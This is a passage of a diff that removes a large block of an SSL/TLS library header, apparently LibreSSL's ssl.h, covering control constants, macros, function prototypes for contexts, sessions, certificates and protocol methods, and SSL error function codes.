-#define SSL_CTRL_SET_TLS_EXT_SRP_USERNAME_CB	75
-#define SSL_CTRL_SET_SRP_VERIFY_PARAM_CB		76
-#define SSL_CTRL_SET_SRP_GIVE_CLIENT_PWD_CB		77
-
-#define SSL_CTRL_SET_SRP_ARG		78
-#define SSL_CTRL_SET_TLS_EXT_SRP_USERNAME		79
-#define SSL_CTRL_SET_TLS_EXT_SRP_STRENGTH		80
-#define SSL_CTRL_SET_TLS_EXT_SRP_PASSWORD		81
-
-#define DTLS_CTRL_GET_TIMEOUT		73
-#define DTLS_CTRL_HANDLE_TIMEOUT	74
-#define DTLS_CTRL_LISTEN			75
-
-#define SSL_CTRL_GET_RI_SUPPORT			76
-#define SSL_CTRL_CLEAR_OPTIONS			77
-#define SSL_CTRL_CLEAR_MODE			78
-
-#define SSL_CTRL_GET_EXTRA_CHAIN_CERTS		82
-#define SSL_CTRL_CLEAR_EXTRA_CHAIN_CERTS	83
-
-#define SSL_CTRL_SET_GROUPS				91
-#define SSL_CTRL_SET_GROUPS_LIST			92
-
-#define SSL_CTRL_SET_ECDH_AUTO			94
-
-#define SSL_CTRL_GET_SERVER_TMP_KEY		109
-
-#define SSL_CTRL_SET_DH_AUTO			118
-
-#define SSL_CTRL_SET_MIN_PROTO_VERSION			123
-#define SSL_CTRL_SET_MAX_PROTO_VERSION			124
-
-#define DTLSv1_get_timeout(ssl, arg) \
-	SSL_ctrl(ssl,DTLS_CTRL_GET_TIMEOUT,0, (void *)arg)
-#define DTLSv1_handle_timeout(ssl) \
-	SSL_ctrl(ssl,DTLS_CTRL_HANDLE_TIMEOUT,0, NULL)
-#define DTLSv1_listen(ssl, peer) \
-	SSL_ctrl(ssl,DTLS_CTRL_LISTEN,0, (void *)peer)
-
-#define SSL_session_reused(ssl) \
-	SSL_ctrl((ssl),SSL_CTRL_GET_SESSION_REUSED,0,NULL)
-#define SSL_num_renegotiations(ssl) \
-	SSL_ctrl((ssl),SSL_CTRL_GET_NUM_RENEGOTIATIONS,0,NULL)
-#define SSL_clear_num_renegotiations(ssl) \
-	SSL_ctrl((ssl),SSL_CTRL_CLEAR_NUM_RENEGOTIATIONS,0,NULL)
-#define SSL_total_renegotiations(ssl) \
-	SSL_ctrl((ssl),SSL_CTRL_GET_TOTAL_RENEGOTIATIONS,0,NULL)
-
-#define SSL_CTX_need_tmp_RSA(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_NEED_TMP_RSA,0,NULL)
-#define SSL_CTX_set_tmp_rsa(ctx,rsa) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_TMP_RSA,0,(char *)rsa)
-#define SSL_CTX_set_tmp_dh(ctx,dh) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_TMP_DH,0,(char *)dh)
-#define SSL_CTX_set_tmp_ecdh(ctx,ecdh) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_TMP_ECDH,0,(char *)ecdh)
-#define SSL_CTX_set_dh_auto(ctx, onoff) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_DH_AUTO,onoff,NULL)
-#define SSL_CTX_set_ecdh_auto(ctx, onoff) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_ECDH_AUTO,onoff,NULL)
-
-#define SSL_need_tmp_RSA(ssl) \
-	SSL_ctrl(ssl,SSL_CTRL_NEED_TMP_RSA,0,NULL)
-#define SSL_set_tmp_rsa(ssl,rsa) \
-	SSL_ctrl(ssl,SSL_CTRL_SET_TMP_RSA,0,(char *)rsa)
-#define SSL_set_tmp_dh(ssl,dh) \
-	SSL_ctrl(ssl,SSL_CTRL_SET_TMP_DH,0,(char *)dh)
-#define SSL_set_tmp_ecdh(ssl,ecdh) \
-	SSL_ctrl(ssl,SSL_CTRL_SET_TMP_ECDH,0,(char *)ecdh)
-#define SSL_set_dh_auto(s, onoff) \
-	SSL_ctrl(s,SSL_CTRL_SET_DH_AUTO,onoff,NULL)
-#define SSL_set_ecdh_auto(s, onoff) \
-	SSL_ctrl(s,SSL_CTRL_SET_ECDH_AUTO,onoff,NULL)
-
-int SSL_CTX_set1_groups(SSL_CTX *ctx, const int *groups, size_t groups_len);
-int SSL_CTX_set1_groups_list(SSL_CTX *ctx, const char *groups);
-
-int SSL_set1_groups(SSL *ssl, const int *groups, size_t groups_len);
-int SSL_set1_groups_list(SSL *ssl, const char *groups);
-
-int SSL_CTX_set_min_proto_version(SSL_CTX *ctx, uint16_t version);
-int SSL_CTX_set_max_proto_version(SSL_CTX *ctx, uint16_t version);
-
-int SSL_set_min_proto_version(SSL *ssl, uint16_t version);
-int SSL_set_max_proto_version(SSL *ssl, uint16_t version);
-
-#ifndef LIBRESSL_INTERNAL
-#define SSL_CTRL_SET_CURVES			SSL_CTRL_SET_GROUPS
-#define SSL_CTRL_SET_CURVES_LIST		SSL_CTRL_SET_GROUPS_LIST
-
-#define SSL_CTX_set1_curves SSL_CTX_set1_groups
-#define SSL_CTX_set1_curves_list SSL_CTX_set1_groups_list
-#define SSL_set1_curves SSL_set1_groups
-#define SSL_set1_curves_list SSL_set1_groups_list
-#endif
-
-#define SSL_CTX_add_extra_chain_cert(ctx,x509) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_EXTRA_CHAIN_CERT,0,(char *)x509)
-#define SSL_CTX_get_extra_chain_certs(ctx,px509) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_GET_EXTRA_CHAIN_CERTS,0,px509)
-#define SSL_CTX_clear_extra_chain_certs(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_CLEAR_EXTRA_CHAIN_CERTS,0,NULL)
-
-#define SSL_get_server_tmp_key(s, pk) \
-	SSL_ctrl(s,SSL_CTRL_GET_SERVER_TMP_KEY,0,pk)
-
-BIO_METHOD *BIO_f_ssl(void);
-BIO *BIO_new_ssl(SSL_CTX *ctx, int client);
-BIO *BIO_new_ssl_connect(SSL_CTX *ctx);
-BIO *BIO_new_buffer_ssl_connect(SSL_CTX *ctx);
-int BIO_ssl_copy_session_id(BIO *to, BIO *from);
-void BIO_ssl_shutdown(BIO *ssl_bio);
-
-int	SSL_CTX_set_cipher_list(SSL_CTX *, const char *str);
-SSL_CTX *SSL_CTX_new(const SSL_METHOD *meth);
-void	SSL_CTX_free(SSL_CTX *);
-long SSL_CTX_set_timeout(SSL_CTX *ctx, long t);
-long SSL_CTX_get_timeout(const SSL_CTX *ctx);
-X509_STORE *SSL_CTX_get_cert_store(const SSL_CTX *);
-void SSL_CTX_set_cert_store(SSL_CTX *, X509_STORE *);
-int SSL_want(const SSL *s);
-int	SSL_clear(SSL *s);
-
-void	SSL_CTX_flush_sessions(SSL_CTX *ctx, long tm);
-
-const SSL_CIPHER *SSL_get_current_cipher(const SSL *s);
-const SSL_CIPHER *SSL_CIPHER_get_by_id(unsigned int id);
-const SSL_CIPHER *SSL_CIPHER_get_by_value(uint16_t value);
-int	SSL_CIPHER_get_bits(const SSL_CIPHER *c, int *alg_bits);
-char *	SSL_CIPHER_get_version(const SSL_CIPHER *c);
-const char *	SSL_CIPHER_get_name(const SSL_CIPHER *c);
-unsigned long 	SSL_CIPHER_get_id(const SSL_CIPHER *c);
-uint16_t SSL_CIPHER_get_value(const SSL_CIPHER *c);
-
-int	SSL_get_fd(const SSL *s);
-int	SSL_get_rfd(const SSL *s);
-int	SSL_get_wfd(const SSL *s);
-const char  * SSL_get_cipher_list(const SSL *s, int n);
-char *	SSL_get_shared_ciphers(const SSL *s, char *buf, int len);
-int	SSL_get_read_ahead(const SSL * s);
-int	SSL_pending(const SSL *s);
-int	SSL_set_fd(SSL *s, int fd);
-int	SSL_set_rfd(SSL *s, int fd);
-int	SSL_set_wfd(SSL *s, int fd);
-void	SSL_set_bio(SSL *s, BIO *rbio, BIO *wbio);
-BIO *	SSL_get_rbio(const SSL *s);
-BIO *	SSL_get_wbio(const SSL *s);
-int	SSL_set_cipher_list(SSL *s, const char *str);
-void	SSL_set_read_ahead(SSL *s, int yes);
-int	SSL_get_verify_mode(const SSL *s);
-int	SSL_get_verify_depth(const SSL *s);
-int	(*SSL_get_verify_callback(const SSL *s))(int, X509_STORE_CTX *);
-void	SSL_set_verify(SSL *s, int mode,
-	    int (*callback)(int ok, X509_STORE_CTX *ctx));
-void	SSL_set_verify_depth(SSL *s, int depth);
-int	SSL_use_RSAPrivateKey(SSL *ssl, RSA *rsa);
-int	SSL_use_RSAPrivateKey_ASN1(SSL *ssl, unsigned char *d, long len);
-int	SSL_use_PrivateKey(SSL *ssl, EVP_PKEY *pkey);
-int	SSL_use_PrivateKey_ASN1(int pk, SSL *ssl, const unsigned char *d, long len);
-int	SSL_use_certificate(SSL *ssl, X509 *x);
-int	SSL_use_certificate_ASN1(SSL *ssl, const unsigned char *d, int len);
-
-int	SSL_use_RSAPrivateKey_file(SSL *ssl, const char *file, int type);
-int	SSL_use_PrivateKey_file(SSL *ssl, const char *file, int type);
-int	SSL_use_certificate_file(SSL *ssl, const char *file, int type);
-int	SSL_CTX_use_RSAPrivateKey_file(SSL_CTX *ctx, const char *file, int type);
-int	SSL_CTX_use_PrivateKey_file(SSL_CTX *ctx, const char *file, int type);
-int	SSL_CTX_use_certificate_file(SSL_CTX *ctx, const char *file, int type);
-int	SSL_CTX_use_certificate_chain_file(SSL_CTX *ctx, const char *file); /* PEM type */
-int	SSL_CTX_use_certificate_chain_mem(SSL_CTX *ctx, void *buf, int len);
-STACK_OF(X509_NAME) *SSL_load_client_CA_file(const char *file);
-int	SSL_add_file_cert_subjects_to_stack(STACK_OF(X509_NAME) *stackCAs,
-	    const char *file);
-int	SSL_add_dir_cert_subjects_to_stack(STACK_OF(X509_NAME) *stackCAs,
-	    const char *dir);
-
-void	SSL_load_error_strings(void );
-const char *SSL_state_string(const SSL *s);
-const char *SSL_rstate_string(const SSL *s);
-const char *SSL_state_string_long(const SSL *s);
-const char *SSL_rstate_string_long(const SSL *s);
-long	SSL_SESSION_get_time(const SSL_SESSION *s);
-long	SSL_SESSION_set_time(SSL_SESSION *s, long t);
-long	SSL_SESSION_get_timeout(const SSL_SESSION *s);
-long	SSL_SESSION_set_timeout(SSL_SESSION *s, long t);
-void	SSL_copy_session_id(SSL *to, const SSL *from);
-X509	*SSL_SESSION_get0_peer(SSL_SESSION *s);
-int	SSL_SESSION_set1_id_context(SSL_SESSION *s,
-	    const unsigned char *sid_ctx, unsigned int sid_ctx_len);
-
-SSL_SESSION *SSL_SESSION_new(void);
-const unsigned char *SSL_SESSION_get_id(const SSL_SESSION *s,
-	    unsigned int *len);
-unsigned int SSL_SESSION_get_compress_id(const SSL_SESSION *s);
-int	SSL_SESSION_print_fp(FILE *fp, const SSL_SESSION *ses);
-int	SSL_SESSION_print(BIO *fp, const SSL_SESSION *ses);
-void	SSL_SESSION_free(SSL_SESSION *ses);
-int	i2d_SSL_SESSION(SSL_SESSION *in, unsigned char **pp);
-int	SSL_set_session(SSL *to, SSL_SESSION *session);
-int	SSL_CTX_add_session(SSL_CTX *s, SSL_SESSION *c);
-int	SSL_CTX_remove_session(SSL_CTX *, SSL_SESSION *c);
-int	SSL_CTX_set_generate_session_id(SSL_CTX *, GEN_SESSION_CB);
-int	SSL_set_generate_session_id(SSL *, GEN_SESSION_CB);
-int	SSL_has_matching_session_id(const SSL *ssl, const unsigned char *id,
-	    unsigned int id_len);
-SSL_SESSION *d2i_SSL_SESSION(SSL_SESSION **a, const unsigned char **pp,
-	    long length);
-
-#ifdef HEADER_X509_H
-X509 *	SSL_get_peer_certificate(const SSL *s);
-#endif
-
-STACK_OF(X509) *SSL_get_peer_cert_chain(const SSL *s);
-
-int SSL_CTX_get_verify_mode(const SSL_CTX *ctx);
-int SSL_CTX_get_verify_depth(const SSL_CTX *ctx);
-int (*SSL_CTX_get_verify_callback(const SSL_CTX *ctx))(int, X509_STORE_CTX *);
-void SSL_CTX_set_verify(SSL_CTX *ctx, int mode,
-    int (*callback)(int, X509_STORE_CTX *));
-void SSL_CTX_set_verify_depth(SSL_CTX *ctx, int depth);
-void SSL_CTX_set_cert_verify_callback(SSL_CTX *ctx, int (*cb)(X509_STORE_CTX *, void *), void *arg);
-int SSL_CTX_use_RSAPrivateKey(SSL_CTX *ctx, RSA *rsa);
-int SSL_CTX_use_RSAPrivateKey_ASN1(SSL_CTX *ctx, const unsigned char *d, long len);
-int SSL_CTX_use_PrivateKey(SSL_CTX *ctx, EVP_PKEY *pkey);
-int SSL_CTX_use_PrivateKey_ASN1(int pk, SSL_CTX *ctx, const unsigned char *d, long len);
-int SSL_CTX_use_certificate(SSL_CTX *ctx, X509 *x);
-int SSL_CTX_use_certificate_ASN1(SSL_CTX *ctx, int len, const unsigned char *d);
-
-void SSL_CTX_set_default_passwd_cb(SSL_CTX *ctx, pem_password_cb *cb);
-void SSL_CTX_set_default_passwd_cb_userdata(SSL_CTX *ctx, void *u);
-
-int SSL_CTX_check_private_key(const SSL_CTX *ctx);
-int SSL_check_private_key(const SSL *ctx);
-
-int SSL_CTX_set_session_id_context(SSL_CTX *ctx, const unsigned char *sid_ctx, unsigned int sid_ctx_len);
-
-SSL *SSL_new(SSL_CTX *ctx);
-int SSL_set_session_id_context(SSL *ssl, const unsigned char *sid_ctx, unsigned int sid_ctx_len);
-
-int SSL_CTX_set_purpose(SSL_CTX *s, int purpose);
-int SSL_set_purpose(SSL *s, int purpose);
-int SSL_CTX_set_trust(SSL_CTX *s, int trust);
-int SSL_set_trust(SSL *s, int trust);
-
-int SSL_CTX_set1_param(SSL_CTX *ctx, X509_VERIFY_PARAM *vpm);
-int SSL_set1_param(SSL *ssl, X509_VERIFY_PARAM *vpm);
-
-
-void	SSL_free(SSL *ssl);
-int 	SSL_accept(SSL *ssl);
-int 	SSL_connect(SSL *ssl);
-int 	SSL_read(SSL *ssl, void *buf, int num);
-int 	SSL_peek(SSL *ssl, void *buf, int num);
-int 	SSL_write(SSL *ssl, const void *buf, int num);
-long	SSL_ctrl(SSL *ssl, int cmd, long larg, void *parg);
-long	SSL_callback_ctrl(SSL *, int, void (*)(void));
-long	SSL_CTX_ctrl(SSL_CTX *ctx, int cmd, long larg, void *parg);
-long	SSL_CTX_callback_ctrl(SSL_CTX *, int, void (*)(void));
-
-int	SSL_get_error(const SSL *s, int ret_code);
-const char *SSL_get_version(const SSL *s);
-
-/* This sets the 'default' SSL version that SSL_new() will create */
-int SSL_CTX_set_ssl_version(SSL_CTX *ctx, const SSL_METHOD *meth);
-
-const SSL_METHOD *SSLv23_method(void);		/* SSLv3 or TLSv1.* */
-const SSL_METHOD *SSLv23_server_method(void);	/* SSLv3 or TLSv1.* */
-const SSL_METHOD *SSLv23_client_method(void);	/* SSLv3 or TLSv1.* */
-
-const SSL_METHOD *TLSv1_method(void);		/* TLSv1.0 */
-const SSL_METHOD *TLSv1_server_method(void);	/* TLSv1.0 */
-const SSL_METHOD *TLSv1_client_method(void);	/* TLSv1.0 */
-
-const SSL_METHOD *TLSv1_1_method(void);		/* TLSv1.1 */
-const SSL_METHOD *TLSv1_1_server_method(void);	/* TLSv1.1 */
-const SSL_METHOD *TLSv1_1_client_method(void);	/* TLSv1.1 */
-
-const SSL_METHOD *TLSv1_2_method(void);		/* TLSv1.2 */
-const SSL_METHOD *TLSv1_2_server_method(void);	/* TLSv1.2 */
-const SSL_METHOD *TLSv1_2_client_method(void);	/* TLSv1.2 */
-
-const SSL_METHOD *TLS_method(void);		/* TLS v1.0 or later */
-const SSL_METHOD *TLS_server_method(void);	/* TLS v1.0 or later */
-const SSL_METHOD *TLS_client_method(void);	/* TLS v1.0 or later */
-
-const SSL_METHOD *DTLSv1_method(void);		/* DTLSv1.0 */
-const SSL_METHOD *DTLSv1_server_method(void);	/* DTLSv1.0 */
-const SSL_METHOD *DTLSv1_client_method(void);	/* DTLSv1.0 */
-
-STACK_OF(SSL_CIPHER) *SSL_get_ciphers(const SSL *s);
-
-int SSL_do_handshake(SSL *s);
-int SSL_renegotiate(SSL *s);
-int SSL_renegotiate_abbreviated(SSL *s);
-int SSL_renegotiate_pending(SSL *s);
-int SSL_shutdown(SSL *s);
-
-const SSL_METHOD *SSL_get_ssl_method(SSL *s);
-int SSL_set_ssl_method(SSL *s, const SSL_METHOD *method);
-const char *SSL_alert_type_string_long(int value);
-const char *SSL_alert_type_string(int value);
-const char *SSL_alert_desc_string_long(int value);
-const char *SSL_alert_desc_string(int value);
-
-void SSL_set_client_CA_list(SSL *s, STACK_OF(X509_NAME) *name_list);
-void SSL_CTX_set_client_CA_list(SSL_CTX *ctx, STACK_OF(X509_NAME) *name_list);
-STACK_OF(X509_NAME) *SSL_get_client_CA_list(const SSL *s);
-STACK_OF(X509_NAME) *SSL_CTX_get_client_CA_list(const SSL_CTX *s);
-int SSL_add_client_CA(SSL *ssl, X509 *x);
-int SSL_CTX_add_client_CA(SSL_CTX *ctx, X509 *x);
-
-void SSL_set_connect_state(SSL *s);
-void SSL_set_accept_state(SSL *s);
-
-long SSL_get_default_timeout(const SSL *s);
-
-int SSL_library_init(void );
-
-char *SSL_CIPHER_description(const SSL_CIPHER *, char *buf, int size);
-STACK_OF(X509_NAME) *SSL_dup_CA_list(STACK_OF(X509_NAME) *sk);
-
-SSL *SSL_dup(SSL *ssl);
-
-X509 *SSL_get_certificate(const SSL *ssl);
-/* EVP_PKEY */ struct evp_pkey_st *SSL_get_privatekey(SSL *ssl);
-
-void SSL_CTX_set_quiet_shutdown(SSL_CTX *ctx,int mode);
-int SSL_CTX_get_quiet_shutdown(const SSL_CTX *ctx);
-void SSL_set_quiet_shutdown(SSL *ssl,int mode);
-int SSL_get_quiet_shutdown(const SSL *ssl);
-void SSL_set_shutdown(SSL *ssl,int mode);
-int SSL_get_shutdown(const SSL *ssl);
-int SSL_version(const SSL *ssl);
-int SSL_CTX_set_default_verify_paths(SSL_CTX *ctx);
-int SSL_CTX_load_verify_locations(SSL_CTX *ctx, const char *CAfile,
-    const char *CApath);
-int SSL_CTX_load_verify_mem(SSL_CTX *ctx, void *buf, int len);
-#define SSL_get0_session SSL_get_session /* just peek at pointer */
-SSL_SESSION *SSL_get_session(const SSL *ssl);
-SSL_SESSION *SSL_get1_session(SSL *ssl); /* obtain a reference count */
-SSL_CTX *SSL_get_SSL_CTX(const SSL *ssl);
-SSL_CTX *SSL_set_SSL_CTX(SSL *ssl, SSL_CTX* ctx);
-void SSL_set_info_callback(SSL *ssl,
-    void (*cb)(const SSL *ssl, int type, int val));
-void (*SSL_get_info_callback(const SSL *ssl))(const SSL *ssl, int type, int val);
-int SSL_state(const SSL *ssl);
-void SSL_set_state(SSL *ssl, int state);
-
-void SSL_set_verify_result(SSL *ssl, long v);
-long SSL_get_verify_result(const SSL *ssl);
-
-int SSL_set_ex_data(SSL *ssl, int idx, void *data);
-void *SSL_get_ex_data(const SSL *ssl, int idx);
-int SSL_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-    CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-
-int SSL_SESSION_set_ex_data(SSL_SESSION *ss, int idx, void *data);
-void *SSL_SESSION_get_ex_data(const SSL_SESSION *ss, int idx);
-int SSL_SESSION_get_ex_new_index(long argl, void *argp,
-    CRYPTO_EX_new *new_func, CRYPTO_EX_dup *dup_func,
-    CRYPTO_EX_free *free_func);
-
-int SSL_CTX_set_ex_data(SSL_CTX *ssl, int idx, void *data);
-void *SSL_CTX_get_ex_data(const SSL_CTX *ssl, int idx);
-int SSL_CTX_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-    CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-
-int SSL_get_ex_data_X509_STORE_CTX_idx(void );
-
-#define SSL_CTX_sess_set_cache_size(ctx,t) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_SESS_CACHE_SIZE,t,NULL)
-#define SSL_CTX_sess_get_cache_size(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_GET_SESS_CACHE_SIZE,0,NULL)
-#define SSL_CTX_set_session_cache_mode(ctx,m) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_SESS_CACHE_MODE,m,NULL)
-#define SSL_CTX_get_session_cache_mode(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_GET_SESS_CACHE_MODE,0,NULL)
-
-#define SSL_CTX_get_default_read_ahead(ctx) SSL_CTX_get_read_ahead(ctx)
-#define SSL_CTX_set_default_read_ahead(ctx,m) SSL_CTX_set_read_ahead(ctx,m)
-#define SSL_CTX_get_read_ahead(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_GET_READ_AHEAD,0,NULL)
-#define SSL_CTX_set_read_ahead(ctx,m) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_READ_AHEAD,m,NULL)
-#define SSL_CTX_get_max_cert_list(ctx) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_GET_MAX_CERT_LIST,0,NULL)
-#define SSL_CTX_set_max_cert_list(ctx,m) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_MAX_CERT_LIST,m,NULL)
-#define SSL_get_max_cert_list(ssl) \
-	SSL_ctrl(ssl,SSL_CTRL_GET_MAX_CERT_LIST,0,NULL)
-#define SSL_set_max_cert_list(ssl,m) \
-	SSL_ctrl(ssl,SSL_CTRL_SET_MAX_CERT_LIST,m,NULL)
-
-#define SSL_CTX_set_max_send_fragment(ctx,m) \
-	SSL_CTX_ctrl(ctx,SSL_CTRL_SET_MAX_SEND_FRAGMENT,m,NULL)
-#define SSL_set_max_send_fragment(ssl,m) \
-	SSL_ctrl(ssl,SSL_CTRL_SET_MAX_SEND_FRAGMENT,m,NULL)
-
-/* NB: the keylength is only applicable when is_export is true */
-void SSL_CTX_set_tmp_rsa_callback(SSL_CTX *ctx,
-    RSA *(*cb)(SSL *ssl, int is_export, int keylength));
-
-void SSL_set_tmp_rsa_callback(SSL *ssl,
-    RSA *(*cb)(SSL *ssl, int is_export, int keylength));
-void SSL_CTX_set_tmp_dh_callback(SSL_CTX *ctx,
-    DH *(*dh)(SSL *ssl, int is_export, int keylength));
-void SSL_set_tmp_dh_callback(SSL *ssl,
-    DH *(*dh)(SSL *ssl, int is_export, int keylength));
-void SSL_CTX_set_tmp_ecdh_callback(SSL_CTX *ctx,
-    EC_KEY *(*ecdh)(SSL *ssl, int is_export, int keylength));
-void SSL_set_tmp_ecdh_callback(SSL *ssl,
-    EC_KEY *(*ecdh)(SSL *ssl, int is_export, int keylength));
-
-const void *SSL_get_current_compression(SSL *s);
-const void *SSL_get_current_expansion(SSL *s);
-
-const char *SSL_COMP_get_name(const void *comp);
-void *SSL_COMP_get_compression_methods(void);
-int SSL_COMP_add_compression_method(int id, void *cm);
-
-/* TLS extensions functions */
-int SSL_set_session_ticket_ext(SSL *s, void *ext_data, int ext_len);
-
-int SSL_set_session_ticket_ext_cb(SSL *s,
-    tls_session_ticket_ext_cb_fn cb, void *arg);
-
-/* Pre-shared secret session resumption functions */
-int SSL_set_session_secret_cb(SSL *s,
-    tls_session_secret_cb_fn tls_session_secret_cb, void *arg);
-
-void SSL_set_debug(SSL *s, int debug);
-int SSL_cache_hit(SSL *s);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_SSL_strings(void);
-
-/* Error codes for the SSL functions. */
-
-/* Function codes. */
-#define SSL_F_CLIENT_CERTIFICATE			 100
-#define SSL_F_CLIENT_FINISHED				 167
-#define SSL_F_CLIENT_HELLO				 101
-#define SSL_F_CLIENT_MASTER_KEY				 102
-#define SSL_F_D2I_SSL_SESSION				 103
-#define SSL_F_DO_DTLS1_WRITE				 245
-#define SSL_F_DO_SSL3_WRITE				 104
-#define SSL_F_DTLS1_ACCEPT				 246
-#define SSL_F_DTLS1_ADD_CERT_TO_BUF			 295
-#define SSL_F_DTLS1_BUFFER_RECORD			 247
-#define SSL_F_DTLS1_CHECK_TIMEOUT_NUM			 316
-#define SSL_F_DTLS1_CLIENT_HELLO			 248
-#define SSL_F_DTLS1_CONNECT				 249
-#define SSL_F_DTLS1_ENC					 250
-#define SSL_F_DTLS1_GET_HELLO_VERIFY			 251
-#define SSL_F_DTLS1_GET_MESSAGE				 252
-#define SSL_F_DTLS1_GET_MESSAGE_FRAGMENT		 253
-#define SSL_F_DTLS1_GET_RECORD				 254
-#define SSL_F_DTLS1_HANDLE_TIMEOUT			 297
-#define SSL_F_DTLS1_HEARTBEAT				 305
-#define SSL_F_DTLS1_OUTPUT_CERT_CHAIN			 255
-#define SSL_F_DTLS1_PREPROCESS_FRAGMENT			 288
-#define SSL_F_DTLS1_PROCESS_OUT_OF_SEQ_MESSAGE		 256
-#define SSL_F_DTLS1_PROCESS_RECORD			 257
-#define SSL_F_DTLS1_READ_BYTES				 258
-#define SSL_F_DTLS1_READ_FAILED				 259
-#define SSL_F_DTLS1_SEND_CERTIFICATE_REQUEST		 260
-#define SSL_F_DTLS1_SEND_CLIENT_CERTIFICATE		 261
-#define SSL_F_DTLS1_SEND_CLIENT_KEY_EXCHANGE		 262
-#define SSL_F_DTLS1_SEND_CLIENT_VERIFY			 263
-#define SSL_F_DTLS1_SEND_HELLO_VERIFY_REQUEST		 264
-#define SSL_F_DTLS1_SEND_SERVER_CERTIFICATE		 265
-#define SSL_F_DTLS1_SEND_SERVER_HELLO			 266
-#define SSL_F_DTLS1_SEND_SERVER_KEY_EXCHANGE		 267
-#define SSL_F_DTLS1_WRITE_APP_DATA_BYTES		 268
-#define SSL_F_GET_CLIENT_FINISHED			 105
-#define SSL_F_GET_CLIENT_HELLO				 106
-#define SSL_F_GET_CLIENT_MASTER_KEY			 107
-#define SSL_F_GET_SERVER_FINISHED			 108
-#define SSL_F_GET_SERVER_HELLO				 109
-#define SSL_F_GET_SERVER_VERIFY				 110
-#define SSL_F_I2D_SSL_SESSION				 111
-#define SSL_F_READ_N					 112
-#define SSL_F_REQUEST_CERTIFICATE			 113
-#define SSL_F_SERVER_FINISH				 239
-#define SSL_F_SERVER_HELLO				 114
-#define SSL_F_SERVER_VERIFY				 240
-#define SSL_F_SSL23_ACCEPT				 115
-#define SSL_F_SSL23_CLIENT_HELLO			 116
-#define SSL_F_SSL23_CONNECT				 117
-#define SSL_F_SSL23_GET_CLIENT_HELLO			 118
-#define SSL_F_SSL23_GET_SERVER_HELLO			 119
-#define SSL_F_SSL23_PEEK				 237
-#define SSL_F_SSL23_READ				 120
-#define SSL_F_SSL23_WRITE				 121
-#define SSL_F_SSL2_ACCEPT				 122
-#define SSL_F_SSL2_CONNECT				 123
-#define SSL_F_SSL2_ENC_INIT				 124
-#define SSL_F_SSL2_GENERATE_KEY_MATERIAL		 241
-#define SSL_F_SSL2_PEEK					 234
-#define SSL_F_SSL2_READ					 125
-#define SSL_F_SSL2_READ_INTERNAL			 236
-#define SSL_F_SSL2_SET_CERTIFICATE			 126
-#define SSL_F_SSL2_WRITE				 127
-#define SSL_F_SSL3_ACCEPT				 128
-#define SSL_F_SSL3_ADD_CERT_TO_BUF			 296
-#define SSL_F_SSL3_CALLBACK_CTRL			 233
-#define SSL_F_SSL3_CHANGE_CIPHER_STATE			 129
-#define SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM		 130
-#define SSL_F_SSL3_CHECK_CLIENT_HELLO			 304
-#define SSL_F_SSL3_CLIENT_HELLO				 131
-#define SSL_F_SSL3_CONNECT				 132
-#define SSL_F_SSL3_CTRL					 213
-#define SSL_F_SSL3_CTX_CTRL				 133
-#define SSL_F_SSL3_DIGEST_CACHED_RECORDS		 293
-#define SSL_F_SSL3_DO_CHANGE_CIPHER_SPEC		 292
-#define SSL_F_SSL3_ENC					 134
-#define SSL_F_SSL3_GENERATE_KEY_BLOCK			 238
-#define SSL_F_SSL3_GET_CERTIFICATE_REQUEST		 135
-#define SSL_F_SSL3_GET_CERT_STATUS			 289
-#define SSL_F_SSL3_GET_CERT_VERIFY			 136
-#define SSL_F_SSL3_GET_CLIENT_CERTIFICATE		 137
-#define SSL_F_SSL3_GET_CLIENT_HELLO			 138
-#define SSL_F_SSL3_GET_CLIENT_KEY_EXCHANGE		 139
-#define SSL_F_SSL3_GET_FINISHED				 140
-#define SSL_F_SSL3_GET_KEY_EXCHANGE			 141
-#define SSL_F_SSL3_GET_MESSAGE				 142
-#define SSL_F_SSL3_GET_NEW_SESSION_TICKET		 283
-#define SSL_F_SSL3_GET_NEXT_PROTO			 306
-#define SSL_F_SSL3_GET_RECORD				 143
-#define SSL_F_SSL3_GET_SERVER_CERTIFICATE		 144
-#define SSL_F_SSL3_GET_SERVER_DONE			 145
-#define SSL_F_SSL3_GET_SERVER_HELLO			 146
-#define SSL_F_SSL3_HANDSHAKE_MAC			 285
-#define SSL_F_SSL3_NEW_SESSION_TICKET			 287
-#define SSL_F_SSL3_OUTPUT_CERT_CHAIN			 147
-#define SSL_F_SSL3_PEEK					 235
-#define SSL_F_SSL3_READ_BYTES				 148
-#define SSL_F_SSL3_READ_N				 149
-#define SSL_F_SSL3_SEND_CERTIFICATE_REQUEST		 150
-#define SSL_F_SSL3_SEND_CLIENT_CERTIFICATE		 151
-#define SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE		 152
-#define SSL_F_SSL3_SEND_CLIENT_VERIFY			 153
-#define SSL_F_SSL3_SEND_SERVER_CERTIFICATE		 154
-#define SSL_F_SSL3_SEND_SERVER_HELLO			 242
-#define SSL_F_SSL3_SEND_SERVER_KEY_EXCHANGE		 155
-#define SSL_F_SSL3_SETUP_KEY_BLOCK			 157
-#define SSL_F_SSL3_SETUP_READ_BUFFER			 156
